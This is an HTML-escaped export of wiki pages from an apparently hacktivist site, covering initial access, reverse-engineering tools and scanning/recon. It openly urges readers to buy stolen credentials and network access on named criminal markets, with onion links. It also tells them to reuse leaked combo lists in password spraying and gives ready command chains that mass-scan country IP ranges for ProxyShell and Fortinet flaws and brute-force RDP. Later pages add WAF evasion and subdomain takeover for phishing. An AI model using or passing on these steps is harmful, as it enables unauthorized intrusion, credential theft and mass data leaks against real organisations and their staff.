&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.&lt;br /&gt;
* http://genesis7zoveavupiiwnrycmaq6uro3kn5h2be3el7wdnbjti2ln2wid.onion/guest/login [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange Email Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Reverse_Engineering&amp;diff=1666</id>
		<title>Reverse Engineering</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Reverse_Engineering&amp;diff=1666"/>
		<updated>2023-10-16T08:57:17Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&#039;&#039;&#039;NOTE:&#039;&#039;&#039; This page is under construction&lt;br /&gt;
&lt;br /&gt;
* https://github.com/NationalSecurityAgency/ghidra&lt;br /&gt;
* https://www.hex-rays.com/products/ida/index.shtml [Paid]&lt;br /&gt;
* https://github.com/AFLplusplus/AFLplusplus&lt;br /&gt;
* https://www.gnu.org/software/gdb&lt;br /&gt;
* https://github.com/x64dbg/x64dbg&lt;br /&gt;
* https://gchq.github.io/CyberChef&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Scanning_and_Recon&amp;diff=1665</id>
		<title>Scanning and Recon</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Scanning_and_Recon&amp;diff=1665"/>
		<updated>2023-10-16T08:41:41Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Reconnaissance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;These tools will scan web applications for vulnerabilities and misconfigurations, remember that they will cause a lot of traffic making lots of requests. Using APIs will advance your scanning but may cost $$$.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NOTE: This is not an exhaustive list.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
=== WAF detect ===&lt;br /&gt;
Your target may have a web application firewall (WAF) which might try to prevent scanning, exploitation and other security tests. It&#039;s important that we can identify what WAF is in place so we can try and bypass it. Some targets might be vulnerable and normally an exploit would work however the WAF is preventing the exploit from popping the box. You can try to encode the payload ([https://portswigger.net/burp/documentation/desktop/tools/decoder Burpsuite is good for this]) amongst other things to bypass the WAF.&lt;br /&gt;
&lt;br /&gt;
* Blog: https://labs.detectify.com/2022/05/09/discovering-the-origin-host-to-bypass-waf&lt;br /&gt;
* Blog: https://blog.yeswehack.com/yeswerhackers/web-application-firewall-bypass&lt;br /&gt;
* Identify and fingerprint web application firewalls: https://github.com/EnableSecurity/wafw00f&lt;br /&gt;
* Detect and bypass web application firewalls: https://github.com/Ekultek/WhatWaf&lt;br /&gt;
* Everything about web application firewalls (educational): https://github.com/0xInfection/Awesome-WAF&lt;br /&gt;
* Nuclei template to detect WAFs: https://github.com/projectdiscovery/nuclei-templates/blob/master/technologies/waf-detect.yaml&lt;br /&gt;
* Detect WAFs using: &amp;lt;code&amp;gt;asnmap -org paypal -silent | dnsx -ptr -ro -silent | cdncheck -resp -silent&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reconnaissance ===&lt;br /&gt;
Automated recon scripts which automates a lot of the boring aspects of recon for you. They can be used to run some cursory automated vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers. Also can perform passive and active recon testing such as subdomain enumeration, credential bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records and directory fuzzing, dorking, ports scanning, screenshots, nuclei scanning on your targets and more. The best one is [https://github.com/six2dez/reconftw reconFTW] but we provide others for comparison.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/six2dez/reconftw | [https://gist.github.com/jhaddix/141d9cb07ca0590dbc43389e0e4af98f Free scan config (no API)]&lt;br /&gt;
* https://github.com/Tib3rius/AutoRecon&lt;br /&gt;
* https://github.com/AdmiralGaust/bountyRecon&lt;br /&gt;
* https://github.com/offhourscoding/recon&lt;br /&gt;
* https://github.com/Sambal0x/Recon-tools&lt;br /&gt;
* https://github.com/yourbuddy25/Hunter&lt;br /&gt;
* https://github.com/venom26/recon/blob/master/ultimate_recon.sh&lt;br /&gt;
* https://gist.github.com/dwisiswant0/5f647e3d406b5e984e6d69d3538968cd&lt;br /&gt;
* https://github.com/capt-meelo/LazyRecon&lt;br /&gt;
* https://github.com/phspade/Automated-Scanner&lt;br /&gt;
* https://github.com/shmilylty/OneForAll&lt;br /&gt;
* https://github.com/SolomonSklash/chomp-scan&lt;br /&gt;
* https://github.com/Screetsec/Sudomy&lt;br /&gt;
* https://github.com/Edu4rdSHL/findomain&lt;br /&gt;
* https://github.com/SilverPoision/Rock-ON&lt;br /&gt;
* https://github.com/epi052/recon-pipeline&lt;br /&gt;
&lt;br /&gt;
=== Vulnerability scanners ===&lt;br /&gt;
To quickly cover a lot of ground it&#039;s a good idea to scan your target using vulnerability scanners as they might be able to discover a vulnerability or misconfiguration that you can&#039;t find. To avoid WAFs make sure to use a list of random user-agent strings and a residential proxy list if possible and maybe encode some payloads.&lt;br /&gt;
&lt;br /&gt;
* Axiom distributes the load of your scanning tools across multiple servers. https://github.com/pry0cc/axiom | [https://twitter.com/Jhaddix/status/1633936278222962688?cxt=HHwWgIDUkeuY9KwtAAAA Twitter Thread]&lt;br /&gt;
* Nuclei scanner: https://github.com/projectdiscovery/nuclei | [https://blog.projectdiscovery.io/ultimate-nuclei-guide The Ultimate Guide to Finding Bugs With Nuclei]&lt;br /&gt;
** WordPress related Nuclei templates: https://github.com/topscoder/nuclei-wordfence-cve&lt;br /&gt;
* Use Osmedeus to build your own reconnaissance system (Great for scanning large amount of target hosts): https://github.com/osmedeus/osmedeus-base [Free and Paid]&lt;br /&gt;
* CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 180 other CMSs: https://github.com/Tuhinshubhra/CMSeeK&lt;br /&gt;
* The Swiss Army knife for automated Web Application Testing: https://github.com/jaeles-project/jaeles | [https://jaeles-project.github.io Jaeles Scanner]&lt;br /&gt;
* Attack Surface Management Platform, used to discover hidden assets and vulnerabilities: https://github.com/1N3/Sn1per&lt;br /&gt;
* Enumerate subdomains and vulnerability scan them: &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/subfinder subfinder] -d nasa.gov -silent | httpx -silent | nuclei -silent -s critical,high,medium,low -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* Wordpress CMS specific vulnerability scanner, version detection, plugin enumeration and user account bruteforce tool: https://github.com/wpscanteam/wpscan | [https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation WPScan Documentation] [Free and paid]&lt;br /&gt;
* Joomla CMS specific vulnerability scanner: https://github.com/OWASP/joomscan&lt;br /&gt;
* Drupal CMS specific vulnerability scanner: https://github.com/immunIT/drupwn&lt;br /&gt;
* Watch [https://www.youtube.com/watch?v=kCLDqvDnGzA Catalan police union hack] to learn how to utilize ZAP to discover vulnerabilities: https://www.zaproxy.org&lt;br /&gt;
* Pyfiscan is a web-application vulnerability and version scanner which can be used to locate out-dated versions of common web-applications: https://github.com/fgeek/pyfiscan&lt;br /&gt;
* User-Agent , X-Forwarded-For and Referer SQLI Fuzzer: https://github.com/root-tanishq/userefuzz&lt;br /&gt;
* Nmap Scripting Engine (NSE) can be used to perform version detection, network discovery and vulnerability scan/exploitation: https://nmap.org/book/man-nse.html | [https://nmap.org/book/nse.html Nmap Scripting Engine] | [https://github.com/nmap/nmap/tree/master/scripts Scripts]&lt;br /&gt;
* Scan for SQLi/XSS/LFI/RFI and other common vulnerabilities: https://github.com/v3n0m-Scanner/V3n0M-Scanner&lt;br /&gt;
* Quickly discover the attack surface, and identify vulnerabilities: https://github.com/yogeshojha/rengine&lt;br /&gt;
* XSS specific scanner and utility focused on automation: https://github.com/hahwul/dalfox&lt;br /&gt;
* high-performance vulnerability scanner! Supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution: https://github.com/zan8in/afrog&lt;br /&gt;
&lt;br /&gt;
=== Subdomain enumeration ===&lt;br /&gt;
Enumerate your targets top level domain (TLD) as part of your recon to identify entry points in your targets infrastructure. Pay special attention to interesting subdomains such as test, dev, backup, etc. Your targets subdomains may also be running out of date software, subdomains might not be behind a WAF where the main page will be, less or no authentication where there should be and more vulnerabilities may exist as opposed to the TLD.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/OWASP/Amass&lt;br /&gt;
* https://github.com/aboul3la/Sublist3r&lt;br /&gt;
* You can also try using [https://github.com/six2dez/reconftw reconftw] for a more comprehensive subdomain enumeration, using different tools and techniques. &amp;lt;code&amp;gt;./reconftw.sh -d nasa.gov -s&amp;lt;/code&amp;gt;&lt;br /&gt;
* https://github.com/projectdiscovery/subfinder&lt;br /&gt;
* Subdomain enumeration dork: &amp;lt;code&amp;gt;[https://www.google.com/search?q=site:.nasa.gov site:.nasa.gov]&amp;lt;/code&amp;gt;&lt;br /&gt;
* https://github.com/projectdiscovery/shuffledns&lt;br /&gt;
* https://github.com/projectdiscovery/dnsx&lt;br /&gt;
* https://github.com/infosec-au/altdns&lt;br /&gt;
* https://github.com/resyncgg/ripgen&lt;br /&gt;
&lt;br /&gt;
==== Subdomain screenshot ====&lt;br /&gt;
Screenshot subdomains during your recon process to quickly sift through and identify different subdomains without needing to load each one&lt;br /&gt;
* gowitness - a golang, web screenshot utility using Chrome Headless: https://github.com/sensepost/gowitness&lt;br /&gt;
* &amp;lt;code&amp;gt;httpx -l subdomains.txt -screenshot&amp;lt;/code&amp;gt; | https://github.com/projectdiscovery/httpx&lt;br /&gt;
* EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible: https://github.com/RedSiege/EyeWitness&lt;br /&gt;
&lt;br /&gt;
==== Subdomain takeover ====&lt;br /&gt;
A subdomain takeover allows us to gain control over a misconfigured or abandoned subdomain. This is done by exploiting vulnerabilities in DNS settings, expired or deleted services, or incomplete migrations. Once control is established, we can employ social engineering tactics such as phishing, this could be hosting phishing pages on legitimate company subdomains that are already trusted by employees.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/EdOverflow/can-i-take-over-xyz&lt;br /&gt;
* https://github.com/Ice3man543/SubOver&lt;br /&gt;
* https://github.com/projectdiscovery/nuclei-templates/tree/main/http/takeovers&lt;br /&gt;
* https://www.hackerone.com/application-security/guide-subdomain-takeovers&lt;br /&gt;
&lt;br /&gt;
==== Subdomain monitoring ====&lt;br /&gt;
Monitor your target for new subdomains whenever they pop up. Sometimes developers will create a new and temporary subdomain for testing and development, be notified whenever this happens. Include vulnerability scanners into the below bash script such as nuclei to automate some security testing as well.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/projectdiscovery/subfinder&lt;br /&gt;
* https://github.com/tomnomnom/anew&lt;br /&gt;
* https://github.com/projectdiscovery/notify&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/bash&lt;br /&gt;
while true&lt;br /&gt;
do&lt;br /&gt;
  subfinder -silent -dL domains.txt -all | anew subdomains.txt | notify&lt;br /&gt;
  sleep 3600&lt;br /&gt;
done&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Be notified when your target updates their website.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/bin/bash&lt;br /&gt;
while true&lt;br /&gt;
do&lt;br /&gt;
  cat subdomains.txt -silent | httpx -sc -cl -location -title -silent | anew changes.txt | notify&lt;br /&gt;
  sleep 15&lt;br /&gt;
done&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Content discovery ===&lt;br /&gt;
Find endpoints, URLs, Parameters, Resources and much more with content discovery.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/praetorian-inc/fingerprintx&lt;br /&gt;
* https://github.com/projectdiscovery/httpx&lt;br /&gt;
* https://github.com/tomnomnom/waybackurls&lt;br /&gt;
* Find AWS S3 buckets and test their permissions: https://github.com/gwen001/s3-buckets-finder&lt;br /&gt;
* Scan for open S3 buckets and dump the contents: https://github.com/sa7mon/S3Scanner&lt;br /&gt;
* Chrome extension that lists Amazon S3 Buckets while browsing: https://github.com/AlecBlance/S3BucketList&lt;br /&gt;
&lt;br /&gt;
==== Fuzzing ====&lt;br /&gt;
* https://github.com/sullo/nikto&lt;br /&gt;
* https://github.com/epi052/feroxbuster&lt;br /&gt;
* https://github.com/OJ/gobuster&lt;br /&gt;
* https://github.com/ffuf/ffuf&lt;br /&gt;
* https://github.com/maurosoria/dirsearch&lt;br /&gt;
&lt;br /&gt;
=== Word Lists ===&lt;br /&gt;
Word lists can be used in your content discovery when performing directory bruteforcing and subdomain bruteforcing.&lt;br /&gt;
&lt;br /&gt;
* All the best word lists for different tools and content discovery goals: https://wordlists.assetnote.io&lt;br /&gt;
* Repository of many different kinds of word lists: https://github.com/danielmiessler/SecLists&lt;br /&gt;
* Quickly generate context-specific wordlists for content discovery from lists of URLs or paths : https://github.com/ameenmaali/wordlistgen&lt;br /&gt;
* Content discovery URLs and files word list: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10&lt;br /&gt;
* File and directory discovery word list: https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content&lt;br /&gt;
* Subdomain enumeration word list: https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a&lt;br /&gt;
* Potentially dangerous files: https://github.com/Bo0oM/fuzz.txt&lt;br /&gt;
* Download and search specific domain names using (only includes popular cloud providers): https://kaeferjaeger.gay/?dir=sni-ip-ranges&lt;br /&gt;
** Search for and extract your targets domains: &amp;lt;code&amp;gt;cat ~/sni_ip_ranges/*.txt | grep &amp;quot;\target\.com&amp;quot; | awk -F&#039;-- &#039; &#039;{print $2}&#039; | tr &#039; &#039; &#039;\n&#039; | tr &#039;[&#039; &#039; &#039; | sed &#039;s/ //&#039; | sed &#039;s/\]//&#039; | sort -u&amp;lt;/code&amp;gt;&lt;br /&gt;
*** Extract only domains: &amp;lt;code&amp;gt;grep -E -o &#039;[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})&#039; ~/sni_ip_ranges/*.txt &amp;gt; domains.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Port scanners ===&lt;br /&gt;
When performing a port scan pay special attention to non-standard ports.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/nmap/nmap&lt;br /&gt;
* https://github.com/projectdiscovery/naabu&lt;br /&gt;
* https://github.com/robertdavidgraham/masscan&lt;br /&gt;
* https://github.com/zmap/zmap&lt;br /&gt;
* https://github.com/RustScan/RustScan&lt;br /&gt;
&lt;br /&gt;
=== Technology scanners ===&lt;br /&gt;
&#039;&#039;&#039;NOTE: using browser add-ons will change your browser fingerprint and reduce anonymity.&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
When performing a penetration test we will want to know what technology is running on the target and what version it&#039;s running as so that later we can start looking for possible working [https://www.kali.org/tools/exploitdb/#searchsploit public exploits].&lt;br /&gt;
&lt;br /&gt;
* Browser add-on to detect web technologies: https://www.wappalyzer.com&lt;br /&gt;
* Browser add-on to detect web technologies: https://www.whatruns.com&lt;br /&gt;
* Browser add-on to detect web technologies: https://builtwith.com/toolbar&lt;br /&gt;
* WhatWeb identifies web technologies: https://github.com/urbanadventurer/whatweb&lt;br /&gt;
* Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning: https://github.com/rverton/webanalyze&lt;br /&gt;
* &amp;lt;code&amp;gt;subfinder -d nasa.gov -silent | httpx -silent | nuclei -t technologies -silent&amp;lt;/code&amp;gt;&lt;br /&gt;
* A utility to detect various technology for a given IP address: https://github.com/projectdiscovery/cdncheck&lt;br /&gt;
&lt;br /&gt;
=== Web Crawlers ===&lt;br /&gt;
Crawl a website, extract all URL endpoints and save them for further analysis. Useful for digging up parameters on websites to test for common vulnerabilities ([https://enlacehacktivista.org/index.php?title=Exploitation#Payloads XSS, SQLi, IDOR, LFI/RFI, etc])&lt;br /&gt;
&lt;br /&gt;
* https://github.com/projectdiscovery/katana&lt;br /&gt;
* https://github.com/jaeles-project/gospider&lt;br /&gt;
* https://github.com/hakluke/hakrawler&lt;br /&gt;
* https://www.zaproxy.org&lt;br /&gt;
* https://github.com/edoardottt/cariddi&lt;br /&gt;
&lt;br /&gt;
=== ASN scanners ===&lt;br /&gt;
Map out an organizations network ranges using ASN information.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/projectdiscovery/asnmap&lt;br /&gt;
* https://github.com/banviktor/asnlookup&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/OWASP/Amass amass] intel -asn [https://bgp.he.net/search?search%5Bsearch%5D=nasa&amp;amp;commit=Search AS21556]&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;echo &#039;nasa&#039; | [https://github.com/j3ssie/Metabigor metabigor] net --org -v&amp;lt;/code&amp;gt;&lt;br /&gt;
